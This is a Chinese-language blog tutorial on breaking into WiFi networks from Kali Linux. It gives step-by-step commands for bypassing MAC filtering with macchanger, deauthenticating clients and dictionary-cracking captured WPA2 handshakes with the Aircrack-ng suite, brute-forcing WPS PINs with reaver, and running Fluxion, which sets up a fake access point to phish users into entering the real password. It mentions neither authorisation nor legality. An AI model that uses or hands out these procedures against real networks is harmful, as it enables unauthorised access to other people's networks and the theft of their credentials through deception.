本文希望可以帮助到想要学习接触此方面、或兴趣使然的你,让你有个大概的印象.
文中可能存在错误操作或错误理解,望大家不吝指正.

!阅前须知!

本文是基于我几年前的一本笔记本,上面记录了我学习网络基础时的部分笔记

本文中的工具可能已经过时,或者使用方法已经改变了,感兴趣可以深入查阅资料.

(但是我还是列出以前的使用方法供大家借鉴).

ps.若对无线攻击手段ARP欺骗感兴趣可以参考以下两篇文章

【无线安全实践入门】基础攻击手段与常用工具简介

【无线安全实践入门】网络扫描和ARP欺骗

ps.

本文环境在Kali下,学习最好具备一点linux基础知识.

本文中的'混杂模式'并不是所有网卡都支持,详请搜索支持网卡型号.

本文第一节和第二节的方法受限于硬件配置等因素,破解时间过长也是合理的.

1.Aircrack-ng套件

非常优秀的无线网络分析套件,功能强大.

许多安全软件套件都默认(添加/调用)此套件来完成操作.

--首先,先要切换到能够支持'混杂模式'的网卡(一般都是购买USB无线网卡)
--开启混杂模式(开启之后,网卡名可能会改变)
> ifconfig (网卡名) down
> iwconfig (网卡名) mode monitor
> ifconfig (网卡名) up

1.1.连接MAC地址绑定的wifi

--查看附件网络中的wifi,并观察其详细信息(channel、BSSID(MAC)等)
> airodump-ng (网卡名) --得知详细信息后,可以停止查看(ctrl+c)
--开始拿有效的mac地址信息(尽量等久点,包多点)
> airodump-ng -c (信道channel) --bssid (BSSID(MAC) (网卡名) --拿到有效mac地址(不要拿到路由器的mac)
--修改本机mac
> ifconfig (网卡名) down
> macchanger -m (MAC地址) (网卡名)
> ifconfig (网卡名) up --注意,此方法拿到有效mac地址,并未拿到wifi密码

1.2.WPA2加密的wifi

--查看附件网络中的wifi,并观察其详细信息(channel、BSSID(MAC)等)
> airodump-ng (网卡名) --得知详细信息后,可以停止查看(ctrl+c)
--开始进行查看route与client的mac地址,[-w]选项的意思就是write
> airodump-ng -w wpa -c (信道channel) --bssid (BSSID(MAC) (网卡名) --ignore-negative-one --查看route与client的mac地址
--开始获得握手包.cap
> airoplay-ng --deauth 10 -a (route的mac) -c (client的mac) (网卡名) --ignore-negative-one --对握手包.cap进行破解
aircrack-ng -w (指定字典) (cap握手包名) --字典可以自己制作(Crunch工具),也可以在网上下载大神的字典
--一个NB的字典,对你的破解!事半功倍!

1.3.WEP加密的wifi

--由于这种加密基本已经舍弃了,所以就不说了

2.路由器的PIN码破解

通过输入PIN码来连接wifi也是可以的,PIN码的破解也是一种不错的方法.

常见的工具有reaverminidwep-gtk等工具,这里我就说下reaver工具.

--首先,先要切换到能够支持'混杂模式'的网卡(一般都是购买USB无线网卡)
--开启混杂模式(开启之后,网卡名可能会改变)
> ifconfig (网卡名) down
> iwconfig (网卡名) mode monitor
> ifconfig (网卡名) up --选做:可以尝试扫描是否有启用WPS的wifi
--Wash工具就是一款针对'判断wifi是否启用WPS'的工具 --查看附件网络中的wifi,并观察PWR值小于70的来破解(记录BSSID,记住要是路由器的)
> airodump-ng (网卡名) --开始进行破解(注意是路由器的MAC地址,PIN码是针对路由器的)
> reaver -i (网卡名) -b (路由器MAC地址) -a -S -vv --1.如果出现 warning fail to associate ...
--则说明破解失败(失败原因包括对象路由器未开启WPS等)
--2.提示给出了 PIN码 或 PIN码和PSK密钥(wifi密码)
--则说明破解成功(记录PIN码)/(使用PSK密钥直接尝试连接wifi) --选做:可以尝试得到wifi密码(PIN码是可以连wifi)
reaver -i (网卡名) -b (路由器MAC地址) -p (刚得到的PIN码)

3.Fluxion工具(推荐)

一个非常不错的社工破解wifi神器.

与前面操作思路不同.

它是通过模拟原有wifi(FakeAP),用户进行连接

然后wifi会断开网络,并向连接用户发送请求(浏览器跳转页面),请求输入原wifi密码

用户在收到请求后,只需输入正确密码,wifi就会恢复网络,而你获得wifi密码

注意,Fluxion会自动判断wifi密码是否正确,从而做出下一步操作

ps.此方法的好处就是不用耗费资源去破解密码.

ps.Fluxion运行时需要调用许多其它工具,部分工具可能需要另行下载(运行时会提示有哪些未下载)

--运行软件(在软件目录下)
> ./fluxion > 网卡(选择网卡)
> channels(选择所有信道)
> 扫描wifi(扫描到需要的结果时,按ctrl+c)
> 选择wifi(输入1、2、3等选择)
--建立一个假AP
> 选择攻击方式(选FakeAP-Hostapd...)
> 选择保存路径(可空格跳过,则保存在桌面/root/Desktop/)
--会自动出现窗口
> 握手包选择(aircrack-ng...)
--抓包分配包
> 数据包分配(Deauth all) --若是以上步骤正确完成,等抓包抓完,会出现选择
> 选择web interface
> 选择语言(提示用户输入密码时的界面语言) --等待用户连接上网,在浏览器输入正确密码(工具会自动验证密码是否正确),工具就会自动停止
--获得wifi正确密码

破解wifi可以说是比较有意思、并且有挑战性的一块知识点了,

更多的无线攻防操作,其实都是建立在连入局域网的前提之下的.

加油,共勉

【无线安全实践入门】破解WiFi密码的多个方法的更多相关文章

  1. 【无线安全实践入门】网络扫描和ARP欺骗

    文中可能存在错误操作或错误理解,望大家不吝指正. 同时也希望可以帮助到想要学习接触此方面.或兴趣使然的你,让你有个大概的印象. !阅前须知! 本文是基于我几年前的一本笔记本,上面记录了我学习网络基础时 ...

  2. Kali Linux下破解WIFI密码挂载usb无线网卡的方法

    Kali Linux下破解WIFI密码挂载usb无线网卡的方法 时间:2014-10-12    来源:服务器之家    投稿:root 首先我要说的是,wifi密码的破解不是想象中的那么容易,目前还 ...

  3. 怎么破解Wifi密码

    破解无络网络Wifi密码,让手机上Wifi不再受限. 方法/步骤 1 上网搜索并下载“Wfi万能钥匙”APK程序,然后将其安装到手机内存中.可以借助手机类管理软件将APK应用安装到手机中. 步骤阅读 ...

  4. Mac系统安装Aircrack-ng破解wifi密码(2)

    我们上一篇文章说过如何通过Aircrack-ng, 破解使用WPA/PSK加密方式的路由密码, 这一篇介绍的是使用Aircrack-ng破解使用WEP加密方式的路由密码: WEP和WPA/PSK的区别 ...

  5. aircrack 破解wifi密码

    分享一个用aircrack破解wifi密码的步骤: 1.新建一个终端 airmon-ng check kill airmon-ng start wlan0 airodump-ng wlan0mon 此 ...

  6. Kali Linux使用Aircrack破解wifi密码(wpa/wpa2)

    Kali Linux能做很多事,但是它主要以渗透测试及'破解wifi密码'闻名. 如果你使用Macbook 请看 使用macbook破解WPA/WPA2 wifi密码 要求: 安装有Kali Linu ...

  7. 分享一个撩妹、装13神技能,0基础用Python暴力破解WiFi密码

    WiFi密码Python暴力破解   Python密码破解部分截图 获取视频资料,转发此文+点击喜欢,然后获取资料请加Python交流群:580478401,就可以获取视频教程+源码 环境准备: py ...

  8. 用 Python 破解 WiFi 密码

    如今,WiFi 跟我们的生活息息相关,无处不在.没有 WiFi 的地方是没有灵魂的! ​ 然而,比没有WiFi更让人绝望的,是有满格WiFi信号却没有密码…… ​ 今天我们就来尝试下,如何利用pyth ...

  9. 路由器安全——破解wifi密码,同时中间人攻击

    聊聊安全那些事儿 篇一:Wi-Fi安全浅析 2016-04-25 13:18:16 141点赞 712收藏 63评论 前言 近期,Wi-Fi相关的安全话题充斥着电视新闻的大屏幕,先是曝出了路由器劫持的 ...

随机推荐

  1. MyBatis中的OGNL教程

    MyBatis中的OGNL教程 有些人可能不知道MyBatis中使用了OGNL,有些人知道用到了OGNL却不知道在MyBatis中如何使用,本文就是讲如何在MyBatis中使用OGNL. 如果我们搜索 ...

  2. String字符串反转

    new StringBuffer("abcde").reverse().toString(); 通过char数组进行转换 package com.test.reverse; pub ...

  3. Bootstrap-轮播图-No.6

    <!DOCTYPE html> <html lang="zh"> <head> <meta charset="UTF-8&quo ...

  4. [2019HDU多校第一场][HDU 6578][A. Blank]

    题目链接:http://acm.hdu.edu.cn/showproblem.php?pid=6578 题目大意:长度为\(n\)的数组要求分别填入\(\{0,1,2,3\}\)四个数中的任意一个,有 ...

  5. 【leetcode】1269. Number of Ways to Stay in the Same Place After Some Steps

    题目如下: You have a pointer at index 0 in an array of size arrLen. At each step, you can move 1 positio ...

  6. Python IDE Ⅱ

    3.设置Pydev 安装完成后,还需要设置一下PyDev,选择Window -> Preferences来设置PyDev.设置Python的路径,从Pydev的Interpreter - Pyt ...

  7. 【Python之路】特别篇--服务商API认证、Restful、一致性哈希

    API加密方式 1/ 加密方式: Md5 (随机字符串 + 时间戳) 2/ 发送方式: http://127.0.0.1:8888/index?pid= MD5加密值 | 时间戳 | 序号 服务端接收 ...

  8. aarch-linux-gnu-g++ install

    # apt install g++-aarch64-linux-gnuReading package lists... 0% Reading package lists... Done Buildin ...

  9. OpenSSL 通过OCSP手动验证证书

    翻译:https://raymii.org/s/articles/OpenSSL_Manually_Verify_a_certificate_against_an_OCSP.html?utm_sour ...

  10. 20190908 NOIP 模拟40

    考试过程: 刚看完题,发现T1是个类lis 问题,但要求$O(nlogn)$,应该是个数据结构优化dp,T2应该是个数据结构,T3是个字符串?没有匹配,不会是后缀数组吧,这是NOIP模拟啊,可能是个d ...